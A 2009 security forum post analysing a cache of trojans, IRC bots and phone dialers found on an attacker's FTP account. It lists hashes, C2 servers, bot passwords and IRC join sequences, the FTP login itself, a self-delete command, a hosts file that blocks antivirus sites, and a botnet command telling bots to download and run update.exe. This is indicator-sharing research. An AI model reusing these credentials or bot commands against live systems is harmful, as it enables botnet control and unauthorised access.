Log In

An impressive collection of trojans and botnets

']['€AM€LiT€ Forum - News, Reports and Alerts

Author

Message

Vektor

2009-08-07
21:43:16

While checking a forum for trojans, I found an iStealer account (nothing unusual) so I checked the FTP used by it, before adding its directories to FTPBot - ftp://ftp.members.lycos.co.uk (user: Acc0n3 password: darkoffice1 ). I was expecting to see there some logs and at least a failed attempt to make a website. But what I found there was a nice collection of .exe's. Even svchost.exe was there. This is one of those times when everyone knows they are trojans before scanning them with an antivirus. But I was curious - what do all these trojans do? Is there any difference between them? So I checked them all, and these are my findings:

OLD/svchost.exe

Code:

File size: 397355 bytes
MD5...: 14dfee6ee798ae0e8e1ddb7ca0346cf2
SHA1..: d1fa30386c924da83203f3803572efc9a025fd4a
SHA256: 5d0bd9daa8c57713cdb587f8848ac506c5dc7dcfcc5177a80b52145debb69072
ssdeep: 6144:TTfAlKngqRCKP7rVuVrvIXaCLcoxHho9GvlQIYHRLu/j7tAQLPso3aIKs:TbY3aC87rVuVcXNcgo9SlOFu/vVbsoKo

Spy-Net trojan, server: secure-mail.no-ip.biz:3390 , client password: abcd1234 .

aol.exe

Code:

File size: 204965 bytes
MD5...: e55884041c006c26f895febb0e1e79c8
SHA1..: 6b6f40851200ee7c39b65b10af9f230b802bb9be
SHA256: 75c1a24a825610e0c25ca2d9bd2a9bdf3fc128855c4f2b9405b66c04b93f8bab
ssdeep: 6144:JSdF2k7dqhvsICSaMWSUMjcFAyv/OA80:QdFb7dSvsICSUhFAYOA5

IRC bot, copies itself as %windir%\winlogin.exe .

Server: duami.zapto.org:6667 (127.0.0.1 when I checked it)
Server password: helm562ray
Nickname format: [USA|00|P|%[number 5]] (example: [USA|00|P|36883])
Channel: #TuX
Channel key: an124

Code:

PASS helm562ray
NICK [USA|00|P|36883]
USER XP-3776 * 0 :TEST
MODE [USA|00|P|36883] +ix
JOIN #TuX an124

cyba.exe

Code:

File size: 290981 bytes
MD5...: c58710e159513b5730049f3f1d15041c
SHA1..: 3c6f71dbf57682937d29a0c53ea692839ca83391
SHA256: c31426ceb4810bf393acc4de10460f0f055c15a98117dbad113526dd45b719fb
ssdeep: 6144:JSvF2k7dqhvsICAe9YjzRIMu4Zwqq6g/hWo5/yJ1UeDGCvsV:QvFb7dSvsICAYYucqrWo56J1Uqtv

IRC bot, copies itself as %systemroot%\winiogon.exe .

Server: 5900.zapto.org:5900 (127.0.0.1 when I checked it)
Server password: chris000
Nickname format: TesT%[number 7] (example: TesT2584411)
Channel: #test
Channel key: helm
Login password for bots: test000

d8.exe

Code:

File size: 33435 bytes
MD5...: fb55a50ee03a66b8eb0fec02f0f26c44
SHA1..: 85a9b117cf0a0e5e36e4989411f3cde90d8fc9f7
SHA256: 48618cfa479f5f5b3e131e7f2ee14e2939ba92e76d97d1528aed0952cb02e6ac
ssdeep: 384:CJBbbbbbGDDzzDFD4P22Xl0FwsPlkqTtzjdM6lfS6tLwSiB3nWducgRnh303oGv:CJwFD4P2FZNxzjdDZwSAXWdmaoGv

Dialer , it downloads a text file with the number to be dialed from http://91.195.118.117/Dialer_Min/number.asp and saves it locally as number.txt.

number.txt wrote:

003727091394
%[your_country]
%[your_IP]
1.8
test disclaimer

d80.exe

Code:

File size: 24108 bytes
MD5...: d99ee7f4810e11fb4c871337b45c00cd
SHA1..: 237bcc06c9816a7aa5e3008762112f3c74f9f5d2
SHA256: a3ce7bcffa505b978cd4a7ebbd5dc3945094ac32b0287b630d0bfc182ef31c69
ssdeep: 384:t+N2oe9OmIlu2s1WbsaxAnwPDbAWBSoHvM3waqsSOMeoBnYN:0y0lu2sEBx4iYWBBywaqyoBnu

Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp .

d9.exe

Code:

File size: 56364 bytes
MD5...: 49efd76c281f31b1c679c45fd543857f
SHA1..: d6200ae364152520e8733a7000e7df678bb05ec5
SHA256: a4459427462178757b04ce3facf56eec0e97dcdf24e9b44188b8bd7e4f7e3176
ssdeep: 768:DZ8qC+wnMDs5OFlwWKF9lE8tiy9p0/AoHUUCzeYTS4otit3wRnAXYnQeSr8xd:DgvOFlwdjtiko0XzeYIw5IQzYxd

Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp .

DarkSons.Com.exe

Code:

File size: 107986 bytes
MD5...: 32e7e236244a9492209aafe9b41d37cd
SHA1..: ce03a796110e5da7e0360e62dc419df0f0f681ab
SHA256: 07511a72cc236af943f7b4afa84c6f38c5427c9287570087a95eb4d263999855
ssdeep: 3072:WwxVMhOC/dTDbq91+mno3t4QZQ3rAHL/Zqc:WTfFDbRnOTrAsc

A WinRAR SFX archive which extracts %windir%\DarkSons.Com.url and executes it ( http://adf.ly/H4v ).

dd.exe

Code:

Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp .

dd2.exe

Code:

Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp .

drago.exe

Code:

File size: 74808 bytes
MD5...: 5effb43cee44682f2af6589502b7d0c0
SHA1..: 4f327c3e56c9f59b258976ef0a2c5c4ab07f0873
SHA256: e5443add501dd577ec5279eaf5c9190bdd3644a71b0f1f61fffac814281db444
ssdeep: 1536:RAxXfVnwErwjs62olf3yosEgKr0jl2EBZemGmGPBGr:RAxPVnhris62o4olklfZKGr

Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp . The .exe is encrypted with a VB crypter (compiled: L:\ªª\Desktop\VB\Malware\Crypter\ROCK\rock.vbp ).

Fixdirs32.exe

Code:

File size: 43008 bytes
MD5...: cc77cca58319ed838c1d03746e1707d4
SHA1..: 42b1dd7e82dd0c15b50f6e00124df27546d24daf
SHA256: 0d5d19440c9a7560161c3d8ac949d61d55b23dca134d15483c2b1582488f31b6
ssdeep: 768:bi0KH7jxgzRNucU5Zvo9ZV/eHl79WYcxMYQBtRlVM1A1pTmTFUC7h42m/MA:W7jYNucdeH19WYcWngAL4uyw

This trojan had its PE headers edited and it doesn't load on most systems. I assume that on systems that can load it it executes %ComSpec% /c "for /L %%a in (1,1,20) do del "%s" && ping -n 2 0.0.0.0" .

FuCk-CrPtD.exe

Code:

File size: 127019 bytes
MD5...: adf15ccd8c387590fc5929a103165a32
SHA1..: bc9e5e9a1b5e15e69567600112cc7f425a343c8c
SHA256: 4ca51ea95f19a4feba54230558958faec1c9e1b239dc183932a71f224f6e0267
ssdeep: 1536:1dY7Ud0VcJ6y3QHTEl5e9XC/sdRuPf11Bu3QeNXJCNiN2Yjsvvvvvvvvvv3vvvvS:10aO4EOWIf43VXSgzUFZq4UTrd

IRC server: idem0.p0cetak.eu:5900 (92.243.24.27)
Server password: Virus
Channel: #FUCk#
Nickname format: VirUs-%[letter 8] (example: VirUs-dfjhmchi )
Bot information: X0R Fully Recoded!

Code:

NICK VirUs-dfjhmchi
USER VirUs "" "tfy" : 8,18Coded 4By 8VirUs..
JOIN :#FUCk#

idem0.p0cetak.eu:5900 wrote:

:Secret.Virus.Gov NOTICE AUTH :*** Looking up your hostname...
:Secret.Virus.Gov NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:Secret.Virus.Gov 001 VirUs-dfjhmchi :Welcome to the Secured Network IRC Network VirUs-dfjhmchi!VirUs@89.123.154.82
:Secret.Virus.Gov 002 VirUs-dfjhmchi :Your host is Secret.Virus.Gov, running version Unreal3.2.8.1
:Secret.Virus.Gov 003 VirUs-dfjhmchi :This server was created Fri Jul 24 2009 at 13:02:28 CEST
:Secret.Virus.Gov 004 VirUs-dfjhmchi Secret.Virus.Gov Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:Secret.Virus.Gov 005 VirUs-dfjhmchi UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=30 CHANLIMIT=#:30 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
:Secret.Virus.Gov 005 VirUs-dfjhmchi WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=Secured-Network CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
:Secret.Virus.Gov 005 VirUs-dfjhmchi EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:Secret.Virus.Gov 251 VirUs-dfjhmchi :There are 1 users and 9987 invisible on 1 servers
:Secret.Virus.Gov 253 VirUs-dfjhmchi 7 :unknown connection(s)
:Secret.Virus.Gov 254 VirUs-dfjhmchi 4 :channels formed
:Secret.Virus.Gov 255 VirUs-dfjhmchi :I have 9988 clients and 0 servers
:Secret.Virus.Gov 265 VirUs-dfjhmchi :Current Local Users: 9988  Max: 15248
:Secret.Virus.Gov 266 VirUs-dfjhmchi :Current Global Users: 9988  Max: 15248
:Secret.Virus.Gov 422 VirUs-dfjhmchi :MOTD File is missing
:VirUs-dfjhmchi MODE VirUs-dfjhmchi :+iwG
:Secret.Virus.Gov 321 VirUs-dfjhmchi Channel :Users  Name
:Secret.Virus.Gov 323 VirUs-dfjhmchi :End of /LIST
PING :Secret.Virus.Gov
:Secret.Virus.Gov 332 VirUs-dfjhmchi #FUCk# :!NAZELbest http://darkogard.webs.com/pig.jpg update.exe 1
:Secret.Virus.Gov 333 VirUs-dfjhmchi #FUCk# ogarD 1249217853
:Secret.Virus.Gov 353 VirUs-dfjhmchi @ #FUCk# :VirUs-dfjhmchi
:Secret.Virus.Gov 366 VirUs-dfjhmchi #FUCk# :End of /NAMES list.

:Secret.Virus.Gov 332 VirUs-dfjhmchi #FUCk# :!NAZELbest http://darkogard.webs.com/pig.jpg update.exe 1

idem0.p0cetak.eu:5900 wrote:

:VirUs-dfjhmchi!VirUs@89.123.154.82 JOIN :#FUCk#
:Secret.Virus.Gov 332 VirUs-dfjhmchi #FUCk# :!NAZELbest http://accnew1.freehostia.com/SPreaD-OG.avi update.exe 1
:Secret.Virus.Gov 333 VirUs-dfjhmchi #FUCk# TuX 1249596793
:Secret.Virus.Gov 353 VirUs-dfjhmchi @ #FUCk# :VirUs-dfjhmchi
:Secret.Virus.Gov 366 VirUs-dfjhmchi #FUCk# :End of /NAMES list.

Backup addresses used by trojans that connect to this server:

ogardf.ircdevils.net:5900
ogardf.helldark.biz:5900

What's with this mania of showing fake .gov domain names? Do they feel more secure if they do that?

update.exe / "pig.jpg" is a phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp .

Code:

File size: 48172 bytes
MD5...: cd13ef0f92d45672a8ee4289f547e158
SHA1..: 5a27594d9f29c14f40393a4508b7a64c313bb8fe
SHA256: 32804c6069b8d79f97dc1143f1318087cd4b02e58355be27cf679ea7a6e017bd
ssdeep: 768:Hbur91acnjN5soJnY/Oj4ghZ8I+zIXX+QcNIqhF+nBrkUoxVlHm6gJEgC:kDlnjjskZ84cNIqhqBrSG/KN

h3h3h3.exe

Code:

HuX.exe

Code:

File size: 89600 bytes
MD5...: 53bf95c220752d11a42cd0fefe1f2547
SHA1..: 207f6c1cd98b60770e277a08f34cf637ff0c790f
SHA256: 37ffe9ef3f75a844ec56a6fc3b855fb2ecaaa935224091ed749117791566afb4
ssdeep: 1536:mDv4CfIIvnUS0LgFuI8VUSGDstR4AkvxR0uAiBQN:4hfIQR0LgFKVUKRBkZVg

IRC server: huxor.psybnc.cz:3211
Channel: #LinuX#
Nickname format: [nLh-VNC]%[letter 6] (example: [nLh-VNC]bfztzw)

Code:

NICK [nLh-VNC]bfztzw
USER mmmsfc "fo9.net" "rage" :mmmsfc
JOIN #LinuX#

huxor.psybnc.cz:3211 wrote:

:HuXoR.Gov NOTICE AUTH :*** Looking up your hostname...
:HuXoR.Gov NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:HuXoR.Gov 001 [nLh-VNC]bfztzw :Welcome to the Secured Network IRC Network [nLh-VNC]bfztzw!mmmsfc@89.123.154.82
:HuXoR.Gov 002 [nLh-VNC]bfztzw :Your host is HuXoR.Gov, running version Unreal3.2.8.1
:HuXoR.Gov 003 [nLh-VNC]bfztzw :This server was created Mon Aug 3 2009 at 05:21:11 CEST
:HuXoR.Gov 004 [nLh-VNC]bfztzw HuXoR.Gov Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:HuXoR.Gov 005 [nLh-VNC]bfztzw UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=30 CHANLIMIT=#:30 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
:HuXoR.Gov 005 [nLh-VNC]bfztzw WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=Secured-Network CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
:HuXoR.Gov 005 [nLh-VNC]bfztzw EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:HuXoR.Gov 251 [nLh-VNC]bfztzw :There are 1 users and 624 invisible on 1 servers
:HuXoR.Gov 253 [nLh-VNC]bfztzw 11 :unknown connection(s)
:HuXoR.Gov 254 [nLh-VNC]bfztzw 12 :channels formed
:HuXoR.Gov 255 [nLh-VNC]bfztzw :I have 625 clients and 0 servers
:HuXoR.Gov 265 [nLh-VNC]bfztzw :Current Local Users: 625  Max: 2258
:HuXoR.Gov 266 [nLh-VNC]bfztzw :Current Global Users: 625  Max: 2258
:HuXoR.Gov 375 [nLh-VNC]bfztzw :- HuXoR.Gov Message of the Day -
:HuXoR.Gov 372 [nLh-VNC]bfztzw :- 3/8/2009 5:26
:HuXoR.Gov 372 [nLh-VNC]bfztzw :- .:: Welcome to HuXoR Kingdom ::.
:HuXoR.Gov 376 [nLh-VNC]bfztzw :End of /MOTD command.
:[nLh-VNC]bfztzw MODE [nLh-VNC]bfztzw :+iwG
:HuXoR.Gov 321 [nLh-VNC]bfztzw Channel :Users  Name
:HuXoR.Gov 323 [nLh-VNC]bfztzw :End of /LIST
PING :HuXoR.Gov
:[nLh-VNC]bfztzw!mmmsfc@89.123.154.82 JOIN :#LinuX#
:HuXoR.Gov 332 [nLh-VNC]bfztzw #LinuX# :!vncstop
:HuXoR.Gov 333 [nLh-VNC]bfztzw #LinuX# MBoY 1249333403
:HuXoR.Gov 353 [nLh-VNC]bfztzw @ #LinuX# :[nLh-VNC]bfztzw @drole
:HuXoR.Gov 366 [nLh-VNC]bfztzw #LinuX# :End of /NAMES list.

imbot.exe

Code:

File size: 81920 bytes
MD5...: 2d694f657333c80415681e2261cc4986
SHA1..: 03166f54b991be74208cfc7a5280b45cf309c1eb
SHA256: 4e3f71704a1943c53dda8f08007440c6c2f11a29a04879e150de0d62288162d4
ssdeep: 1536:Cw/081FVBbVcRp4SB+5ZcLAfReL7vGAV/oML://0WBxcRp4SQ5ZwAuGAV/9L

IRC server: mandown.homeip.net:6900
Server password: darkoffice
Channel: #darksons
Channel key: darkoffice
Nickname format: [%[country]|00|P|%[number 5]]
Login password for bots: darkoffice

Code:

PASS darkoffice
NICK [USA|00|P|45129]
USER XP-1573 * 0 :TEST
JOIN #darksons darkoffice

mandown.homeip.net:6900 wrote:

:irc.oc256.com NOTICE AUTH :*** Looking up your hostname...
:irc.oc256.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
PING :53D5378D
:irc.oc256.com 001 [USA|00|P|45129] :Welcome to the oc256 IRC Network [USA|00|P|45129]!XP-1573@89.123.154.82
:irc.oc256.com 002 [USA|00|P|45129] :Your host is irc.oc256.com, running version Unreal3.2.8.1
:irc.oc256.com 003 [USA|00|P|45129] :This server was created Sun May 24 15:01:33 2009
:irc.oc256.com 004 [USA|00|P|45129] irc.oc256.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:irc.oc256.com 005 [USA|00|P|45129] UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=25 CHANLIMIT=#:25 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
:irc.oc256.com 005 [USA|00|P|45129] WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=oc256 CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
:irc.oc256.com 005 [USA|00|P|45129] EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:irc.oc256.com 251 [USA|00|P|45129] :There are 1 users and 424 invisible on 1 servers
:irc.oc256.com 252 [USA|00|P|45129] 1 :operator(s) online
:irc.oc256.com 254 [USA|00|P|45129] 3 :channels formed
:irc.oc256.com 255 [USA|00|P|45129] :I have 425 clients and 0 servers
:irc.oc256.com 265 [USA|00|P|45129] :Current Local Users: 425  Max: 4049
:irc.oc256.com 266 [USA|00|P|45129] :Current Global Users: 425  Max: 703
:irc.oc256.com 375 [USA|00|P|45129] :- irc.oc256.com Message of the Day -
:irc.oc256.com 372 [USA|00|P|45129] :- 27/7/2009 18:27
:irc.oc256.com 372 [USA|00|P|45129] :- d
:irc.oc256.com 376 [USA|00|P|45129] :End of /MOTD command.
:[USA|00|P|45129] MODE [USA|00|P|45129] :+i
:irc.oc256.com 321 [USA|00|P|45129] Channel :Users  Name
:irc.oc256.com 323 [USA|00|P|45129] :End of /LIST
:[USA|00|P|45129]!XP-1573@89.123.154.82 JOIN :#darksons
:irc.oc256.com 353 [USA|00|P|45129] @ #darksons :[USA|00|P|45129]
:irc.oc256.com 366 [USA|00|P|45129] #darksons :End of /NAMES list.

The trojan changes %systemroot%\drivers\etc\hosts (all entries are added twice),

%systemroot%\drivers\etc\hosts wrote:

127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.grisoft.com
127.0.0.1 www.grisoft.com
127.0.0.1 virustotal.com
127.0.0.1 www.virustotal.com
127.0.0.1 virscan.org
127.0.0.1 www.virscan.org
127.0.0.1 scanner.novirusthanks.org
127.0.0.1 www.scanner.novirusthanks.org
127.0.0.1 virusscan.jotti.org
127.0.0.1 www.virusscan.jotti.org
127.0.0.1 threatexpert.com

imfud.exe
Code:
File size: 135168 bytes
MD5 : b2b62b5f1bf4ce08ba12eaf0304175d6
SHA1 : 1fd14c3ad9330749031193e3ab05d8cfbd767d06
SHA256: 6bbf27596ec7c38b6e2e0b0a5da1fb6a5c4e1faf7bbfd7beb4a9afbc28124106

Same IRC trojan as above, that connects to irc://mandown.homeip.net:6900/#darksons . Not so "FUD" anymore.

kmeeee.exe

Code:

File size: 118828 bytes
MD5...: 17a91addef20cf4e87a72f9a90bfa355
SHA1..: 635ba7b2822f662171e87a9ebce70eff33bdeb5b
SHA256: 9b57336a61367bd4f4c14b87cf842844f931c4803517593d5b015764f8e440ea
ssdeep: 1536:6JkfDwq/WzTNCzM68c4CVTYMuu3HSI4642+lsQ2yq2ZAhKr0DuhIM:zgzxCz2m3P464VlsVyzZWK8uhIM

Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp . The .exe is encrypted with a VB crypter (compiled: D:\20-July\S1\ProjectCC.vbp ).

marin.exe

Code:

File size: 58924 bytes
MD5...: 06a3a8a451b707cfc714715330e7ba30
SHA1..: 3812a37e337dafecb25157fa02c3bab9dbfcd4d2
SHA256: f44f1b74ca04d9f897fd588fe07245fd895739d5d8e49aa2ca78f3b6791014d3
ssdeep: 1536:PDGwbikNYfbjtfThXCRksLFeqX8xm183K:7GwbhUjtfVXCRksLhMxm19

Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp .

msgrrr.exe

Code:

File size: 522737 bytes
MD5...: ecc9f2cdd9b586d45dd9d06f9031cf68
SHA1..: 8403a8e6c1088a5758c9da019a9a511be0c2384e
SHA256: b59c3de984b32043b4c469b75419d3d708e8d5094fdedd787cd9831d4fee8218
ssdeep: 12288:h5+kh+uiKbl+r16SSbCPayJkUR+T4wVT6j5PeE1+ZN6X:z+k6KbG16TbWayKw+T4wVOjHGN6X

IRC server: owned.saveyourpicture.com:4321 (78.41.204.48)
Channel: #1337
Channel key: inhere
Nickname format: [1337]%[number 9]
Login password for bots: mylogin

Code:

NICK [1337]455391923
USER pilltljaho 0 0 :[1337]455391923
JOIN #1337 inhere
USERHOST [1337]455391923
MODE [1337]455391923 -xi+B

MsN.Com.exe

Code:

File size: 107961 bytes
MD5...: ec7942c9516f539d810a457aa6675e3f
SHA1..: ed9b97f58adbe3af9e4b7ffb7d33d8907e1783ad
SHA256: fe9e04635d0c5450fea32e6b7bcdac865cbc8ef83ff77b2d6d1e0df947b9ddd9
ssdeep: 3072:WwxVMhOC/dTDbq91+mno3t4QZQ3rAHL/Zq6:WTfFDbRnOTrAs6

A WinRAR SFX archive which extracts %windir%\MsN.Com.url and executes it ( http://adf.ly/H4x ).

new.exe

Code:

File size: 46592 bytes
MD5...: 67f5f32622d00fa3d6bb252541a4b2a6
SHA1..: fdbb1dd2e459761d914fa5fb05bf6284a6559858
SHA256: b8a44e279a7449af1cdf5aeb5f50590f99c0bffbb51e83507ce89fd8f09dec12
ssdeep: 768:JDI8Vu6GeZzvFK3bufjMAho68vKqhVFKqHil90yar8brBbS:JDv4CfITvK+Vw90ya4b

iStealer, ftp://ftp.members.lycos.co.uk user: Acc0n3 password: darkoffice1

noob.exe

Code:

File size: 39980 bytes
MD5...: d4f8e1aafa6e96e6eb9a0b3b37614560
SHA1..: bd6861794486c89f45e337ba44c58bb1f159d428
SHA256: a07065870f726f7826776dae383f77fdc696dddd75fbc380f9351680d5017a38
ssdeep: 768:5kMlvT6l+FCiXvgUdnQ/crPKXAgFxrAyC0pQUQ0PmCnGdbYSYT:WMZSyoIQEuwC85+PmCnGFFu

Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp .

ogard.exe

Code:

File size: 13312 bytes
MD5...: 943af3f1a4669dc8db21c5146dfca5df
SHA1..: 88ce3a91a01c695bfe6e8326840090026d99c264
SHA256: 766d8173f0a1eb532bbfed9d6c4d6e902b457c6e922b27a456335f7d08f68bc7
ssdeep: 384:1Xc4AqDJFf/3VDxUnmJW6+yNZ/ZInc5xJ0p:m4A6Ff/3VDxUnd6+yNZ/2IH

IRC bot that connects to irc://idem0.p0cetak.eu:5900/#FUCk# , as shown above.

Ogard-FUCK.exe

Code:

IRC bot that connects to irc://idem0.p0cetak.eu:5900/#FUCk# , as shown above.

ogardfud.exe

Code:

File size: 41984 bytes
MD5...: 87c8dbce089392358d8e6ca610e10070
SHA1..: 33a5fee41c56fa8c3996ff4041684209350b104e
SHA256: 73c634034b4e2e9a97fe3cd6c82b7ccb407a9963161d142be05ad4667c69a2ad
ssdeep: 768:HDI8Vu6GeZzvFK3bufjMAhodyq0wwZg44uzdEDU2:HDv4CfIqq0wwZg4Hz4v

IRC bot that connects to irc://idem0.p0cetak.eu:5900/#FUCk# , as shown above (copies itself as c:\OGa\RD\GOx.exe).

ogardnew.exe

Code:

File size: 66560 bytes
MD5...: 4860bb01573e9357530a0c4079555e6d
SHA1..: 1d010b4f7b435b5d1b6425f1ba50f75f20398d9a
SHA256: f736bed176d050f2fba34e5587a66802d6c9bb7e4e97c68b24e3aa4013271965
ssdeep: 1536:MWG6qTWoK5cZIlHl3uFhHILREJLCJ+6QTk:MWG6pHRF+/JX5k

IRC bot that connects to irc://idem0.p0cetak.eu:5900/#FUCk# , as shown above (copies itself as c:\SW\EET\GOx.exe).

OG-FUCK.exe

Code:

MD5...: 7c02e3ea702b7618b5c6c53d80283e9f
SHA1..: eb5ddbd1ab6e507d408e679af181c3718e620417
SHA256: 324e48c016aaeee6c162c63bdfbe20ff0b1fa236cf7094114565b7d7899d8bfb
ssdeep: 768:MJeAj0xUpc8wVoPn/oZqyWeVC2Eb9sPK9TRFhbAitnps2YQe98rX:2d02pc87n/oZqyW0+bnZqiVYQXX

IRC bot that connects to irc://idem0.p0cetak.eu:5900/#FUCk# , as shown above (copies itself as c:\SW\EET\GOx.exe).

OG-VrX-Flood.exe

Code:

File size: 140288 bytes
MD5...: 9b94cebf536a1ce41d1561a5cffc6aaa
SHA1..: b729f79887ed3acb5f2dd4d7a25175b1ee52aef9
SHA256: d12b96e1bf769061625750d0c32d17146b077e6284760ad919012e6084803fec
ssdeep: 3072:4m1+bxkicnXt+mfdQFxsr3NCoRBy4K2og9QhebyD4Ww0Z+:V+bOdRrrdCoXyXhz4byD7NZ

IRC ogard5.ircdevils.net:5900 (92.243.24.27) - same as idem0.p0cetak.eu:5900 (92.243.24.27, see above)
Server password: VrX
Channel: #fLOOD#
Channel key: VrX
Nickname format: %[letter 3|4] (example: zks )

Code:

PASS VrX
NICK zks
USER sf 0 0 :zks
USERHOST zks
MODE zks -x+i
JOIN #fLOOD# VrX

packed.exe

Code:

File size: 106496 bytes
MD5...: 72c20287cd5f2578ca44a7216654cb9f
SHA1..: ac364c4c78e6f364729f6356bb52782962073f51
SHA256: 4f0b51e957a02fee49cb8592ac21b62ece061a65ad2906e293d60fc788086932
ssdeep: 3072:ShfIevZrVCaTRUMnhWfTqLzb8OjDOr8S3mQNkjpebRrgwpHQerXTj4QFn7:UfIeRr1Rxnwf2LkOjDOrDrjjZd7

IRC bot that connects to irc://idem0.p0cetak.eu:5900/#FUCk# , as shown above (copies itself as c:\SW\EET\GOx.exe).

packeds.exe

Code:

File size: 104960 bytes
MD5 : bdf0b056db6ff48dd49eb59d80198801
SHA1 : ad1d94667149203db52521bc7bb68ba45da3464c
SHA256: 24c00fbd81242404778a6233e00bf1768c45b089f09c4a40e17bb735dd46d15b

IRC server: sik.totalunix.net:6969 (64.120.6.42)
Server password: letmein
Channel: ##spread##
Channel key: spread
Nickname format: [00|%[countrty]|%[number 6]] (example: [00|USA|189918] )

Code:

PASS letmein
NICK [00|USA|189918]
USER XP-7167 * 0 :TEST
MODE [00|USA|189918] -ix
JOIN ##spread## spread

sik.totalunix.net:6969 wrote:

:irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
:irc.priv8net.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:irc.priv8net.com 001 [00|USA|189918]
:irc.priv8net.com 002 [00|USA|189918] : M0dded by uNkn0wn Crew
:irc.priv8net.com 003 [00|USA|189918]
:irc.priv8net.com 004 [00|USA|189918] : www.uNkn0wn.eu - iD@uNkn0wn.eu
:irc.priv8net.com 005 [00|USA|189918]
:irc.priv8net.com 005 [00|USA|189918]
:irc.priv8net.com 005 [00|USA|189918]
:irc.priv8net.com 422 [00|USA|189918] :MOTD File is missing
:[00|USA|189918] MODE [00|USA|189918] :+iwxG
PING :irc.priv8net.com

Backup addresses used by trojans that connect to this server:

idem0.p0cetak.eu:5900

pi.exe

Code:

File size: 8192 bytes
MD5...: fcd447ae3660619092112b682e2d205d
SHA1..: bc6efe2eac957de20406f1b767a2f58f18211515
SHA256: b5a668a1df388b17cb1edd0bde321f198a7c54bfd5f9b8b397f81ac2cfb63b2a
ssdeep: 192:0JGc1Zl2+VAfNxl1THs6xgzgVGjPlRsgL76InQAzXs:0JGcMJxDTHfRmCCxc

Poison Ivy, server: terkejen.no-ip.biz:15963 (the trojan copies itself as %systemroot%\msconf.exe).

PS.exe

Code:

File size: 54784 bytes
MD5...: 51ffbd0f1625fd375184806aa3380110
SHA1..: d2455f7d2b1d617530731933292da58ff14d24aa
SHA256: 45303bfb9cb8ebf1a5ec2cf2f4470fcd1f9b665c5cb57b2ec5bd0c84c120982c
ssdeep: 768:uDI8Vu6GeZzvFK3bufjMAho6+csSY3XlcDktNSXo4kw17t9OncW1wMdW:uDv4CfIdlpNSXoodeG8

IRC server: huxor.psybnc.cz:3211
Server password: HEHE
Channel: #pstore#
Channel key: VrX
